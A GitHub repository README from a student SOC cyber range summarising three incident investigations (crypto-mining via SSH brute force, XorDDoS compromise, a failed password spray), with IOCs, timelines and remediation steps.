Skip to content

SancLogic/SOC-Cyber-Range-Investigations

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

48 Commits
Detections
Detections
 
 
IOCs
IOCs
 
 
Reports
Reports
 
 
README.md
README.md
 
 

Repository files navigation

SOC Cyber Range Investigations

Real-world threat activity investigated through hands-on detection and response inside a student cyber range environment.

  • Reports/ – Full Incident Reports
  • Iocs/ – IOC Lists Extracted
  • Detections/ – KQL Rules/Alerts (Coming Soon)

Incident Library

Incident-2400: Azure Abuse – Crypto-Mining & Brute-Force

Incident-2401: Linux VM Compromise – XorDDoS Malware

Incident-2402: Password Spray (No Compromise)

 
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
   
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
 

Incident 2400 Summary

Incident 2400 – Azure Abuse, Crypto-Mining & Brute-Force

Incident ID: 2400
Date Investigated: March 18, 2025
Environment: LOG(N) Pacific | Cyber Range

A suspicious Azure abuse report led to the discovery of crypto-mining and external brute-force attacks originating from internal lab VMs. The attacker exploited weak SSH credentials, deployed miner payloads, and used compromised systems to launch outbound brute-force attacks to external services.

  • Initial compromised host: linux-vulnmgmt-kobe
  • Laterally moved to: levi-linux-vulnerability, sakel-lunix-2
  • External targets included YouTube, Twitter, etc.

  • Miner binaries: .diicot, .balu, .bisis
  • Downloaded via wget and curl
  • 240K+ outbound brute-force attempts via SSH

  • Initial compromise: Feb 18, 2025
  • Mining activity: Feb 20–22
  • Outbound abuse: Mar 14–17

  • Internal lab: Azure-hosted Linux VMs
  • Public IP involved: 20.81.228.191

  • Crypto-mining for financial gain
  • Platform abuse through brute-force
  • No outbound egress restrictions + weak SSH creds

- The attacker gained entry using brute force attacks and was able to gain entry due to weak credentials - They hid their activity using scripts and scheduled tasks.

  1. Secure Remote Access
    Limit who can connect to systems remotely and require strong, unique passwords or authentication methods.

  2. Block Malicious Traffic
    Prevent compromised systems from connecting to known hacker servers or mining networks by controlling outbound network traffic.

  3. Update Credentials
    Immediately change all passwords on affected systems and avoid using shared or reused credentials going forward.

  4. Monitor for Suspicious Behavior
    Set up security alerts to catch unusual logins or hidden programs that could signal another attack.

  5. Clean Up and Reset
    Remove all infected systems, restore from clean backups, and do not reuse compromised virtual machines or images.

Date Event
Feb 18 Attacker gained access via weak credentials
Feb 20–22 Crypto-mining tools installed and active
Mar 14–17 Outbound brute-force attacks launched
Mar 18 Microsoft abuse alert triggered
Mar 20 Incident fully contained and cleaned

 
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
   
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
 

Incident 2401 Summary

Incident 2401 – Linux VM Compromise: XorDDoS Malware

Incident ID: 2401
Date Investigated: March 24, 2025
Environment: LOG(N) Pacific | Cyber Range

A Linux VM exposed to the internet was compromised through brute-force SSH attacks. The attacker deployed XorDDoS malware, maintained access over time using hidden cron jobs and SSH keys, and communicated with a known command-and-control (C2) server. Attempts were also made to move laterally and hide their presence using renamed system binaries.

  • Compromised host: jr-linux-vm-test
  • Attacker used public SSH scanning infrastructure
  • C2 IP observed: 169.239.130.12

  • Malware: XorDDoS variant deployed post-compromise
  • Persistence via cron jobs, fake system binaries
  • C2 communication and botnet control attempts

  • Initial access: Jan 30, 2025 - Feb 28, 2025
  • Malware activity re-detected: Mar 24, 2025
  • Previous cleanup done: Mar 18–20

  • Azure-hosted VM: jr-linux-vm-test
  • C2 communication over HTTP (port 80)
  • External origin IPs associated with botnet activity

  • Maintain access for malware deployment and system abuse
  • Resource hijacking (CPU/traffic) and possible lateral movement
  • Weak SSH configuration enabled multiple compromises

  • Gained root access via SSH brute-force
  • Injected SSH keys and set up malicious cron jobs
  • Used renamed Linux binaries to evade detection
  • Connected to known XorDDoS C2 infrastructure

  1. Harden SSH Access
    Restrict access to known IPs and use key-based authentication.

  2. Rotate Credentials
    Change all passwords and keys, especially for root and shared users.

  3. Rebuild Systems
    Don’t reuse infected machines — Delete the VMs.

  4. Block Malicious Infrastructure
    Use threat intel to block known C2 servers like 169.239.130.12.

  5. Increase Monitoring
    Watch for signs of persistence (cron jobs, SSH key changes, renamed binaries).

Date Event
Jan 30 Initial SSH brute-force compromise
Feb–Mar Dormant persistence (no alerts)
Mar 18–20 Cleanup attempt performed
Mar 24 Malware re-detected and C2 communication observed
Mar 25 Host isolated and deleted

 
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
   
 
 
 
 
 
 
 
 
 
   
 
 
 
   
 
 
 
   
 
 
 
 
 
 
 
 
 

Incident 2402 Summary

Incident 2402 – Password Spray Attempt (No Compromise)

Incident ID: 2402
Date Investigated: March 30, 2025
Environment: LOG(N) Pacific | Cyber Range

A high-severity alert flagged suspicious logon activity targeting an internet-facing lab VM. Investigation confirmed a password spray attempt from external IPs, focused on the built-in guest account. No successful authentication or system compromise occurred. The device was not enrolled in endpoint protection and was publicly exposed at the time of the attack.

  • Targeted device: finallabscott
  • Attacker IPs from: China, Russia, and global scanning infrastructure
  • Account targeted: guest (built-in, enabled)

  • Password spray attack (1,000+ failed attempts)
  • Attempted remote login via "Network Logon"
  • No successful authentication or shell activity observed

  • Alert triggered: Mar 29, 2025
  • Logs reviewed: Mar 23–30, 2025

  • Device: finallabscott
  • Exposure: Internet-facing with no Defender for Endpoint
  • Remote IPs: 218.92.0.186, 5.178.87.180 (VT: known scanners)

  • External actors targeting public systems with weak/default credentials
  • Guest account was accessible and lacked protections
  • Likely part of a mass credential stuffing campaign

  • Automated spray tools attempted login to guest account
  • No lateral movement, persistence, or malware seen
  • Failed authentication logs confirmed across multiple time windows

  1. Disable Unused Accounts
    Remove or disable default/guest accounts across all VMs.

  2. Limit Exposure
    Avoid exposing unmanaged devices directly to the internet.

  3. Enable Endpoint Protection
    Enroll all devices in Defender for Endpoint or equivalent tools.

  4. Geo-Block Suspicious IPs
    Block known malicious ranges from untrusted regions where possible.

  5. Enforce Lockout Policies
    Implement lockout after failed login attempts to prevent enumeration.

Date Event
Mar 23–29 Multiple failed logons targeting guest
Mar 29 Alert triggered by Sentinel (Password Spray)
Mar 30 Incident triaged, no compromise confirmed

About

Reports, detections, and simulations from SOC lab investigations and cyber range exercises using Sentinel, Defender, KQL, and Azure.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors